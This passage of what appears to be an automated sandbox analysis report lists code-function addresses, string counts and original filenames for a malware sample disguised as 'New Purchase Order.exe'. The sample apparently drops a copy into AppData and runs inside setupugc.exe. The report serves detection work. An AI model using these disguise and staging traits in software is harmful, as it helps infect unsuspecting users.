            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0187A1189_2_0187A118
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018681589_2_01868158
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018720009_2_01872000
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018A03E69_2_018A03E6
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017EE3F09_2_017EE3F0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0189A3529_2_0189A352
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018602C09_2_018602C0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018802749_2_01880274
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018A05919_2_018A0591
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E05359_2_017E0535
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0188E4F69_2_0188E4F6
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018844209_2_01884420
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018924469_2_01892446
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E07709_2_017E0770
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017DC7C09_2_017DC7C0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018047509_2_01804750
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017FC6E09_2_017FC6E0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017F69629_2_017F6962
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018AA9A69_2_018AA9A6
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E29A09_2_017E29A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E28409_2_017E2840
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017EA8409_2_017EA840
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180E8F09_2_0180E8F0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017C68B89_2_017C68B8
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01896BD79_2_01896BD7
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0189AB409_2_0189AB40
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017DEA809_2_017DEA80
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017EAD009_2_017EAD00
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0187CD1F9_2_0187CD1F
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017DADE09_2_017DADE0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017F8DBF9_2_017F8DBF
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01880CB59_2_01880CB5
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E0C009_2_017E0C00
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D0CF29_2_017D0CF2
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0185EFA09_2_0185EFA0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017ECFE09_2_017ECFE0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01822F289_2_01822F28
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01800F309_2_01800F30
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D2FC89_2_017D2FC8
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01882F309_2_01882F30
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01854F409_2_01854F40
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0189CE939_2_0189CE93
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E0E599_2_017E0E59
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0189EEDB9_2_0189EEDB
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0189EE269_2_0189EE26
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017F2E909_2_017F2E90
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017CF1729_2_017CF172
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017EB1B09_2_017EB1B0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018AB16B9_2_018AB16B
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0181516C9_2_0181516C
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0188F0CC9_2_0188F0CC
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018970E99_2_018970E9
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0189F0E09_2_0189F0E0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E70C09_2_017E70C0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0182739A9_2_0182739A
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017CD34C9_2_017CD34C
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0189132D9_2_0189132D
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018812ED9_2_018812ED
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017FB2C09_2_017FB2C0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E52A09_2_017E52A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0187D5B09_2_0187D5B0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018A95C39_2_018A95C3
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018975719_2_01897571
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D14609_2_017D1460
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0189F43F9_2_0189F43F
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0189F7B09_2_0189F7B0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018916CC9_2_018916CC
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018256309_2_01825630
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E99509_2_017E9950
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017FB9509_2_017FB950
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018759109_2_01875910
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0184D8009_2_0184D800
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E38E09_2_017E38E0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01855BF09_2_01855BF0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0181DBF99_2_0181DBF9
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0189FB769_2_0189FB76
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017FFB809_2_017FFB80
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01825AA09_2_01825AA0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0187DAAC9_2_0187DAAC
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01881AA39_2_01881AA3
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0188DAC69_2_0188DAC6
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0189FA499_2_0189FA49
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01897A469_2_01897A46
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01853A6C9_2_01853A6C
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E3D409_2_017E3D40
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017FFDC09_2_017FFDC0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01891D5A9_2_01891D5A
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01897D739_2_01897D73
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0189FCF29_2_0189FCF2
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01859C329_2_01859C32
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0189FFB19_2_0189FFB1
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0189FF099_2_0189FF09
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017A3FD29_2_017A3FD2
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017A3FD59_2_017A3FD5
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E1F929_2_017E1F92
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E9EB09_2_017E9EB0
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: 10_2_0185E08410_2_0185E084
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: 10_2_058ECC8010_2_058ECC80
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: 10_2_058ECC9010_2_058ECC90
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: 10_2_0AF10F6810_2_0AF10F68
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: 14_2_017B010014_2_017B0100
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: 14_2_0180600014_2_01806000
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: 14_2_018402C014_2_018402C0
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: 14_2_017C053514_2_017C0535
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: 14_2_017C077014_2_017C0770
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: 14_2_017E475014_2_017E4750
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: 14_2_017BC7C014_2_017BC7C0
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: 14_2_017DC6E014_2_017DC6E0
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: 14_2_017D696214_2_017D6962
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: 14_2_017C29A014_2_017C29A0
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: 14_2_017CA84014_2_017CA840
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: 14_2_017C284014_2_017C2840
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: 14_2_017EE8F014_2_017EE8F0
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: 14_2_017A68B814_2_017A68B8
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: 14_2_017F889014_2_017F8890
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: 14_2_017BEA8014_2_017BEA80
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: 14_2_017CED7A14_2_017CED7A
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: 14_2_017CAD0014_2_017CAD00
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: 14_2_017BADE014_2_017BADE0
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: 14_2_017C8DC014_2_017C8DC0
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: 14_2_017D8DBF14_2_017D8DBF
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: 14_2_017C0C0014_2_017C0C00
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: 14_2_017B0CF214_2_017B0CF2
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: 14_2_0183EFA014_2_0183EFA0
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: 14_2_017E0F3014_2_017E0F30
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: 14_2_01802F2814_2_01802F28
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: 14_2_017B2FC814_2_017B2FC8
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: 14_2_01834F4014_2_01834F40
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: 14_2_017C0E5914_2_017C0E59
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: 14_2_017D2E9014_2_017D2E90
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: 14_2_017AF17214_2_017AF172
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: 14_2_017F516C14_2_017F516C
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: 14_2_017CB1B014_2_017CB1B0
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: 14_2_017AD34C14_2_017AD34C
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: 14_2_017C33F314_2_017C33F3
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: 14_2_017DD2F014_2_017DD2F0
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: 14_2_017DB2C014_2_017DB2C0
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: 14_2_017C52A014_2_017C52A0
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: 14_2_017B146014_2_017B1460
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: 14_2_018074E014_2_018074E0
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: 14_2_017C349714_2_017C3497
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: 14_2_017CB73014_2_017CB730
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: 14_2_017C995014_2_017C9950
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: 14_2_017DB95014_2_017DB950
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: 14_2_017C599014_2_017C5990
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: 14_2_0182D80014_2_0182D800
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: 14_2_017C38E014_2_017C38E0
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: 14_2_01835BF014_2_01835BF0
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: 14_2_017FDBF914_2_017FDBF9
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: 14_2_017DFB8014_2_017DFB80
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: 14_2_01833A6C14_2_01833A6C
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: 14_2_017C3D4014_2_017C3D40
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: 14_2_017DFDC014_2_017DFDC0
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: 14_2_017D9C2014_2_017D9C20
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: 14_2_01839C3214_2_01839C32
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: 14_2_017C1F9214_2_017C1F92
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: 14_2_017C9EB014_2_017C9EB0
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: 14_2_0042EB9314_2_0042EB93
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0372A35217_2_0372A352
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_037303E617_2_037303E6
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0367E3F017_2_0367E3F0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0371027417_2_03710274
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036F02C017_2_036F02C0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036F815817_2_036F8158
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0366010017_2_03660100
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0370A11817_2_0370A118
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_037281CC17_2_037281CC
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_037241A217_2_037241A2
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_037301AA17_2_037301AA
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0370200017_2_03702000
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0367077017_2_03670770
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0369475017_2_03694750
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0366C7C017_2_0366C7C0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0368C6E017_2_0368C6E0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0367053517_2_03670535
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0373059117_2_03730591
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0372244617_2_03722446
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0371442017_2_03714420
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0371E4F617_2_0371E4F6
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0372AB4017_2_0372AB40
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03726BD717_2_03726BD7
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0366EA8017_2_0366EA80
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0368696217_2_03686962
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036729A017_2_036729A0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0373A9A617_2_0373A9A6
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0367284017_2_03672840
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0367A84017_2_0367A840
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0369E8F017_2_0369E8F0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036568B817_2_036568B8
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036E4F4017_2_036E4F40
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03712F3017_2_03712F30
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036B2F2817_2_036B2F28
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03690F3017_2_03690F30
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0367CFE017_2_0367CFE0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03662FC817_2_03662FC8
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036EEFA017_2_036EEFA0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03670E5917_2_03670E59
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0372EE2617_2_0372EE26
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0372EEDB17_2_0372EEDB
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0372CE9317_2_0372CE93
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03682E9017_2_03682E90
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0367AD0017_2_0367AD00
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0370CD1F17_2_0370CD1F
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0366ADE017_2_0366ADE0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03688DBF17_2_03688DBF
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03670C0017_2_03670C00
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03660CF217_2_03660CF2
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03710CB517_2_03710CB5
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0365D34C17_2_0365D34C
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0372132D17_2_0372132D
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036B739A17_2_036B739A
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_037112ED17_2_037112ED
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0368B2C017_2_0368B2C0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036752A017_2_036752A0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A516C17_2_036A516C
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0365F17217_2_0365F172
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0373B16B17_2_0373B16B
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0367B1B017_2_0367B1B0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0372F0E017_2_0372F0E0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_037270E917_2_037270E9
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036770C017_2_036770C0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0371F0CC17_2_0371F0CC
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0372F7B017_2_0372F7B0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036B563017_2_036B5630
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_037216CC17_2_037216CC
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0372757117_2_03727571
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0370D5B017_2_0370D5B0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0366146017_2_03661460
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0372F43F17_2_0372F43F
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0372FB7617_2_0372FB76
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036ADBF917_2_036ADBF9
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036E5BF017_2_036E5BF0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0368FB8017_2_0368FB80
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036E3A6C17_2_036E3A6C
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03727A4617_2_03727A46
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0372FA4917_2_0372FA49
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0371DAC617_2_0371DAC6
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036B5AA017_2_036B5AA0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03711AA317_2_03711AA3
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0370DAAC17_2_0370DAAC
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0367995017_2_03679950
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0368B95017_2_0368B950
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0370591017_2_03705910
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036DD80017_2_036DD800
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036738E017_2_036738E0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0372FF0917_2_0372FF09
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0372FFB117_2_0372FFB1
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03671F9217_2_03671F92
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03679EB017_2_03679EB0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03727D7317_2_03727D73
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03673D4017_2_03673D40
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03721D5A17_2_03721D5A
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0368FDC017_2_0368FDC0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036E9C3217_2_036E9C32
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0372FCF217_2_0372FCF2
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_00CF1C4017_2_00CF1C40
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_00CECB8017_2_00CECB80
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_00CECB7817_2_00CECB78
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_00CECDA017_2_00CECDA0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_00CEAE2017_2_00CEAE20
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_00CF52D017_2_00CF52D0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_00CF34C017_2_00CF34C0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_00CF34BB17_2_00CF34BB
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_00D0B8D017_2_00D0B8D0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0348E56317_2_0348E563
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0348E44817_2_0348E448
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0348D96817_2_0348D968
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0348E8FC17_2_0348E8FC
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: String function: 0365B970 appears 280 times
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: String function: 036DEA12 appears 86 times
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: String function: 036B7E54 appears 111 times
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: String function: 036A5130 appears 58 times
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: String function: 036EF290 appears 105 times
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: String function: 0182EA12 appears 37 times
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: String function: 01807E54 appears 97 times
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: String function: 01815130 appears 58 times
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: String function: 0184EA12 appears 86 times
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: String function: 0185F290 appears 105 times
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: String function: 017CB970 appears 280 times
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: String function: 01827E54 appears 111 times
            Source: New Purchase Order.exe, 00000000.00000002.2165111682.0000000002E71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs New Purchase Order.exe
            Source: New Purchase Order.exe, 00000000.00000002.2169659316.0000000007390000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs New Purchase Order.exe
            Source: New Purchase Order.exe, 00000000.00000000.2117156904.0000000000A34000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamevBdq.exe> vs New Purchase Order.exe
            Source: New Purchase Order.exe, 00000000.00000002.2165884062.0000000003F69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs New Purchase Order.exe
            Source: New Purchase Order.exe, 00000000.00000002.2160258865.0000000000ECE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs New Purchase Order.exe
            Source: New Purchase Order.exe, 00000009.00000002.2391524148.0000000001348000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSETUPUGC.EXEj% vs New Purchase Order.exe
            Source: New Purchase Order.exe, 00000009.00000002.2391524148.000000000138B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSETUPUGC.EXEj% vs New Purchase Order.exe
            Source: New Purchase Order.exe, 00000009.00000002.2391856999.00000000018CD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs New Purchase Order.exe
            Source: New Purchase Order.exeBinary or memory string: OriginalFilenamevBdq.exe> vs New Purchase Order.exe
            Source: New Purchase Order.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
